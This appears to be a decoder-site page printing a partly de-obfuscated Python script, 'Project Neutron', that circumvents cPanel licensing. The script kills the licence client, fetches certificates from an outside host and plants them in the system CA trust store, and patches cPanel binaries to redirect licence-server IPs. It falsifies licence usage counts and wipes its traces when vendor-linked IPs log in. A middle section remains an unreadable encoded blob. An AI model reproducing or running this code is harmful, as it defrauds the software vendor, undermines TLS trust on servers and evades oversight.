Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


#!/usr/bin/python3
import base64, codecs
magic = '#!/usr/bin/python3

import sys
sys.tracebacklimit = 0
import os
import socket
import ssl
import random
import subprocess
import time
try:
    import requests # pip3 install requests
except:
    os.system("pip3 install requests")
    time.sleep(40)
    import requests
import json
try:
    import getmac
except:
    os.system("pip3 install getmac")
    time.sleep(40)
    import getmac
import hashlib

authips = ("208.74.121.85", "208.74.123.2", "208.74.123.3", "208.74.121.86", "208.74.121.83", "208.74.121.82")
host = "111.11.111.11"
port = 2089
debug = False
tag = "[Project Neutron Beta] "

def check_connection(ip):
    # Increase (failsafeness)
    testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    testconn = testsocket.connect_ex((ip, 2089))
    testsocket.close()
    if testconn == 0:
        return True
    return False

def run(cmd, suppress = False):
    #cmd = cmd.split(" ")
    # TODO: Find a way to suppress output to stdout
    if suppress:
        pass
    result = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
    return result.stdout.decode("utf-8")

def libboundlol():
    global authips
    reachable = False
    while not reachable:
        authip = random.choice(authips)
        if check_connection(authip):
            reachable = True
    return authip

def log(msgone="", msgtwo="", msgthree=""):
    logent = "{} {} {}".format(msgone, msgtwo, msgthree)
    print(logent)
    with open("/root/neutron/neutron.log", "a") as wfh:
        wfh.write(logent + "\n")

def dumper(log):
    dumped = ""
    if os.path.exists("./dumpedliscs"):
        fh = open("./dumpedliscs", "r") # learn how to use "with" idiot fuck off
        dumped = fh.read()
        fh.close()
    dumped = dumped + "\n" + ("=" * 10) + "\n" + log
    fh = open("./dumpedliscs", "w")
    fh.write(dumped)
    fh.close()

def killCpKeyClt():
    try:
        run("killall cpkeyclt")
        run("killall cpkeyclt")
        os.unlink("/var/run/cpkeyclt.pid")
        os.unlink("/run/cpkeyclt.pid")
        run("killall cpkeyclt")
    except:
        pass

def runCpKeyClt():
    run("/usr/local/cpanel/cpkeyclt &")

def checkStalledCpKeyClt():
    global debug
    if os.path.isfile("/var/run/cpkeyclt.pid"):
        upcpStat = run("/usr/local/cpanel/scripts/upcp-running")
        ckcLimit = 300
        ckcAge = os.path.getmtime("/var/run/cpkeyclt.pid")
        now = int(time.time())
        timediff = now - ckcAge
        if upcpStat.find("is running") != -1 and timediff > ckcLimit:
            killCpKeyClt()
        elif timediff > ckcLimit:
            killCpKeyClt()
            runCpKeyClt()
        else:
            if debug:
                log(tag + "[DEBUG] Time difference between file mtime and now is: {}".format(timediff))

def fix_spaces(headers):
    headers = headers.split("\r\n")
    headers = list(filter(None, headers))
    pheaders = []
    for header in headers:
        header = header.split()
        i = 4
        try:
            while header[i] == " ":
                del header[i]
                i += 1
        except:
            pass
        header = " ".join(header)
        pheaders.append(header)
    pheaders = "\r\n\r\n".join(pheaders)
    pheaders = pheaders.strip()
    return pheaders

def decode_chrc(encs):
    # this code's quality is above darkens IQ
    encs = encs.replace("\t","0")
    encs = encs.split(" ")
    headers = []
    for enc in encs:
        group = ""
        for ind, char in enumerate(enc):
            if (ind+1) % 4 == 0:
                group = group + char
                group = int(int(group, 16) / 3)
            else:
                group = group + char
                continue
            headers.append(chr(group))
            group = ""
        headers.append("\r\n\r\n")
    headers = "".join(headers)
    headers = fix_spaces(headers)
    return headers

def encode_chrc(stri):
    encoded = ""
    stri = stri.replace("\r\n\r\n", "\n")
    for char in stri:
        if char == "\n":
            encoded = encoded + " "
            continue
        asciiVal = ord(char)
        asciiVal = asciiVal * 3
        hexVal = format(asciiVal, "04x").upper()
        hexVal = hexVal.replace("0","\t")
        encoded = encoded + hexVal
    return encoded

def getConfirmation():
    mac = getmac.get_mac_address()
    if mac.find(":") == -1:
        log("Cannot get MAC address! Neutron requires at least 1 network interface running.")
        exit(0)
    mac = hashlib.sha256(mac.encode('utf-8')).hexdigest()
    try:
        h = requests.get("https://iw63893210.lisans4.com/codenameNeutron/get.php?mach=" + mac, headers={"User-Agent":"NeutronWebClient"}, timeout=60)
        out = h.text
        out = json.loads(out)
        if out["received"] != True:
            log("Failed to parse correct confirmation!")
            exit(0)
        
        if out["result"] != True:
            neutronFile = os.path.abspath(__file__)
            neutronBinPath = os.path.dirname(neutronFile) + "/neutron.bin"
            os.unlink(neutronBinPath)
            exit(0)
        
        params = {"current_users":out["current_users"], "domain_count":out["domain_count"], "total_users":out["total_users"], "suspended_users":out["suspended_users"], "reserved_users":out["reserved_users"], "domainless_users":out["domainless_users"]}
        params = json.dumps(params)
        params = encode_chrc(params)
        
        with open("/root/neutron/neutron.cfg", "w") as wfh:
            wfh.write(params)
    except Exception as e:
        log("Failed to get and write Neutron confirmation! Error: ", e)
        exit(0)

def bail(remove = False):
    out = run("who")
    if out.find("208.74") != -1 or out.find("184.94.197") != -1 or remove:
        #os.unlink("/usr/local/cpanel/cpkeyclt")
        #os.unlink("/usr/local/cpanel/cpsrvd.so")
        
        neutronFile = os.path.abspath(__file__)
        neutronCfgPath = os.path.dirname(neutronFile) + "/neutron.cfg"
        
        neutronBinPath = os.path.dirname(neutronFile) + "/neutron.bin"
        
        if os.path.isfile(neutronCfgPath):
            os.unlink(neutronCfgPath)
        
        if os.path.isfile("/root/neutron/gd-class2-root.crt"):
            os.replace("/root/neutron/gd-class2-root.crt", "/usr/local/cpanel/share/ssl/certs/gd-class2-root.crt")
        
        if os.path.isfile("/root/neutron/certificate.pem"):
            os.unlink("/root/neutron/certificate.pem")
        
        if os.path.isfile("/etc/pki/ca-trust/source/anchors/auth.pem"):
            os.unlink("/etc/pki/ca-trust/source/anchors/auth.pem")
        
        if os.path.isfile("/usr/local/cpanel/scripts/preupcp"):
            os.unlink("/usr/local/cpanel/scripts/preupcp")
        
        if os.path.isfile("/usr/local/cpanel/scripts/postupcp"):
            os.unlink("/usr/local/cpanel/scripts/postupcp")
        
        if os.path.isfile("/etc/cron.d/neutron"):
            os.unlink("/etc/cron.d/neutron")
        
        if os.path.isfile("/etc/sysconfig/network-scripts/ifcfg-lo300"):
            os.system("ifconfig lo:'
love = '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'
god = 'ind("BEGIN") == -1:
            log("Failed to download remote certificate!")
            exit(0)
        with open("/root/neutron/certificate.pem", "w") as wfh:
            wfh.write(out)
    except:
        log("Failed to write local certificate pem to local directory!")
        exit(0)
    
    # Get my certificate (auth.crt)
    try:
        h = requests.get("https://iw63893210.lisans4.com/codenameNeutron/giveAuthCert.php?cmd=mineSingle", headers={"User-Agent":"NeutronWebClient"}, timeout=60)
        out = h.text
        if out.find("BEGIN") == -1:
            log("Failed to download remote certificate!")
            exit(0)
        with open("/usr/local/cpanel/share/ssl/certs/gd-class2-root.crt", "w") as wfh:
            wfh.write(out)
        
        with open("/usr/local/cpanel/share/ssl/certs/comodo-root.crt", "w") as wfh:
            wfh.write(out)
        
        with open("/etc/pki/ca-trust/source/anchors/auth.pem", "w") as wfh:
            wfh.write(out)
        run("update-ca-trust")
    except:
        log("Failed to write local certificate to local directory!")
        exit(0)

def patchBins():
    run("/usr/bin/sed -i s#3230382e37342e3132312e3835#3131312e31312e3131312e3131#g /usr/local/cpanel/cpkeyclt", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3832#3131312e31312e3131312e3131#g /usr/local/cpanel/cpkeyclt", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3836#3131312e31312e3131312e3131#g /usr/local/cpanel/cpkeyclt", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3833#3131312e31312e3131312e3131#g /usr/local/cpanel/cpkeyclt", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132332e32#3131312e31312e3131312e31#g /usr/local/cpanel/cpkeyclt", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132332e33#3131312e31312e3131312e31#g /usr/local/cpanel/cpkeyclt", 1)
    
    run("/usr/bin/sed -i s#3230382e37342e3132312e3835#3131312e31312e3131312e3131#g /usr/local/cpanel/cpsrvd.so", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3832#3131312e31312e3131312e3131#g /usr/local/cpanel/cpsrvd.so", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3836#3131312e31312e3131312e3131#g /usr/local/cpanel/cpsrvd.so", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132312e3833#3131312e31312e3131312e3131#g /usr/local/cpanel/cpsrvd.so", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132332e32#3131312e31312e3131312e31#g /usr/local/cpanel/cpsrvd.so", 1)
    run("/usr/bin/sed -i s#3230382e37342e3132332e33#3131312e31312e3131312e31#g /usr/local/cpanel/cpsrvd.so", 1)

def setRequirements():
    installBailChk()
    if not os.path.isfile("/usr/sbin/ifconfig"):
        run("yum -y install net-tools")
        time.sleep(5)
    getCerts()
    installDnsmasq()
    restartDnsmasq()
    installLoInt()
    #patchBins()
    #preupcpSetup()
    #postupcpSetup()

def checkRunning():
    procs = run("/bin/ps aux | grep -v bash")
    if procs.count("neutron.bin") > 1:
        return True
    return False

def getRandomSpace():
    randSpaceCnt = random.randint(1,12)
    return " " * randSpaceCnt

def processLicenseRequest(request):
    with open("/root/neutron/neutron.cfg", "r") as rfh:
        params = rfh.read()
    
    params = decode_chrc(params)
    if debug:
        log(tag + " Neutron config: ", params)
    params = json.loads(params.strip())
    
    txtRequest = request
    request = request.split("\r\n")
    for line in request:
        line = line.split(" ", 1)
        
        lineZero = line[0]
        if lineZero == "910":
            # Current Users
            origVal = line[0] + " " + line[1]
            
            currentUsers = int(line[1])
            currentUsers = currentUsers - params["current_users"]
            if currentUsers < 0:
                currentUsers = 0
            line[1] = str(currentUsers)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
            
        elif lineZero == "911":
            # Domain Count
            origVal = line[0] + " " + line[1]
            
            domainCount = int(line[1])
            domainCount = domainCount - params["domain_count"]
            if domainCount < 0:
                domainCount = 0
            line[1] = str(domainCount)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
        elif lineZero == "931":
            # Total Users
            origVal = line[0] + " " + line[1]
            
            totalUsers = int(line[1])
            totalUsers = totalUsers - params["total_users"]
            if totalUsers < 0:
                totalUsers = 0
            line[1] = str(totalUsers)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
        elif lineZero == "932":
            # Suspended Users
            origVal = line[0] + " " + line[1]
            
            suspendedUsers = int(line[1])
            suspendedUsers = suspendedUsers - params["suspended_users"]
            if suspendedUsers < 0:
                suspendedUsers = 0
            line[1] = str(suspendedUsers)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
        elif lineZero == "933":
            # Reserved Users
            origVal = line[0] + " " + line[1]
            
            reservedUsers = int(line[1])
            reservedUsers = reservedUsers - params["reserved_users"]
            if reservedUsers < 0:
                reservedUsers = 0
            line[1] = str(reservedUsers)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
        elif lineZero == "934":
